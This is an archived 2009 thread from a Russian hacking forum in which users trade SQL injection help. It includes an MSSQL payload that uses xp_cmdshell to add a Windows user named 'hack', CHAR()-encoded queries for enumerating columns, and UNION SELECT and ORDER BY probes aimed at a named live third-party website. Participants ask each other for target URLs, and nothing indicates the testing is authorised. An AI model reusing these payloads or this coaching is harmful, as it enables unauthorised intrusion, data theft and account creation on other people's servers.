HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #4731  
Старый 17.01.2009, 19:27
j0ker13
Участник форума
Регистрация: 28.07.2008
Сообщений: 199
Провел на форуме:
861008

Репутация: 58
По умолчанию

как бы спрашивал но вопрос теперь в другом) есть mysql-inj с файл_прив=У) при попытке прочитать папку с сайтом ничего не показывает хотя содержимое других папок отображает) как и файлов) может ли быть так что для мускула нет прав прочитать файл или содержимое папки?
 
Ответить с цитированием

  #4732  
Старый 17.01.2009, 19:38
AkyHa_MaTaTa
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме:
3152874

Репутация: 1020


Отправить сообщение для AkyHa_MaTaTa с помощью ICQ
По умолчанию

да либо не хватает прав либо не верно указан путь.
 
Ответить с цитированием

  #4733  
Старый 17.01.2009, 19:38
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161

Репутация: 142


Отправить сообщение для Велемир с помощью ICQ
По умолчанию

Ругается он на кавычки и никакие where= не прокатят+на HEX ругается,и интересно,как я колонки буду выбирать,если я их не знаю.Колонка1,колонка2...жес ь
 
Ответить с цитированием

  #4734  
Старый 17.01.2009, 19:41
z00MAN
Постоянный
Регистрация: 20.11.2008
Сообщений: 406
Провел на форуме:
2358980

Репутация: 930
По умолчанию

Цитата:
Сообщение от Велемир  
Ругается он на кавычки и никакие where= не прокатят+на HEX ругается,и интересно,как я колонки буду выбирать,если я их не знаю.Колонка1,колонка2...жес ь
дай урл, думаю многое станет ясным

Последний раз редактировалось z00MAN; 17.01.2009 в 19:45..
 
Ответить с цитированием

  #4735  
Старый 17.01.2009, 19:42
R1dex
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865

Репутация: 571
Отправить сообщение для R1dex с помощью ICQ
По умолчанию

Выше, с помощью запроса, который составил l1ght - получаешь первую колонку, а потом not in.

А ещё лучше - кинуть ссылку.
 
Ответить с цитированием

  #4736  
Старый 17.01.2009, 20:03
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161

Репутация: 142


Отправить сообщение для Велемир с помощью ICQ
По умолчанию

Цитата:
Сообщение от l1ght  
3 top 1 column_name from information_schema.columns where table_name='x'
(select+top+1+column_name+from+information_schema. columns+where+table_name='users')--

Не работает )

ЗЫ: Не получается составить процедуру к БД =_=.

Типо такой:

xp_cmdshell [NET USER hack password /ADD]

1+and+1=(select+xp_cmdshell+[NET USER help password /ADD])--

Что-то вроде такоого ).Преобразовывал и в хекс,и в юрл, и наоборот.

Последний раз редактировалось Велемир; 17.01.2009 в 20:34..
 
Ответить с цитированием

  #4737  
Старый 17.01.2009, 20:09
R1dex
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865

Репутация: 571
Отправить сообщение для R1dex с помощью ICQ
По умолчанию

А что пишет-то?
Хексил users без ковычки?
 
Ответить с цитированием

  #4738  
Старый 17.01.2009, 20:30
[Raz0r]
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
Провел на форуме:
3244717

Репутация: 1980
Отправить сообщение для [Raz0r] с помощью ICQ
По умолчанию

(select+top+1+column_name+from+information_schema. columns+where+table_name=CHAR(117)+CHAR(115)+CHAR( 101)+CHAR(114)+CHAR(115))--
В гете нужно + на %2B менять
(select+top+1+column_name+from+information_schema. columns+where+table_name=CHAR(117)%2BCHAR(115)%2BC HAR(101)%2BCHAR(114)%2BCHAR(115))--
 
Ответить с цитированием

  #4739  
Старый 17.01.2009, 21:41
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557

Репутация: 606


По умолчанию

Почему когда делаешь вот так -
Цитата:
http://www.forestforum.ru/index.php?page=3+order+by+9--
то есть несуществующая колонка. Пишет, что колонки такой нет..
Потом когда подбираешь количество колонок
Цитата:
http://www.forestforum.ru/index.php?page=3+order+by+6--
структура запроса уже другая и видно, что колонок вроде как 4.
Однако когда делаешь селект - то пишется, что The used SELECT statements have a different number of columns
Цитата:
http://www.forestforum.ru/index.php?page=3+union+select+1,2,3,4--
Почему так?
 
Ответить с цитированием

  #4740  
Старый 17.01.2009, 21:46
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

попугай
http://www.forestforum.ru/index.php?page=-3+union+select+1,2,3,4,5,version()--

Там не один запрос
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Сценарии/CMF/СMS 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ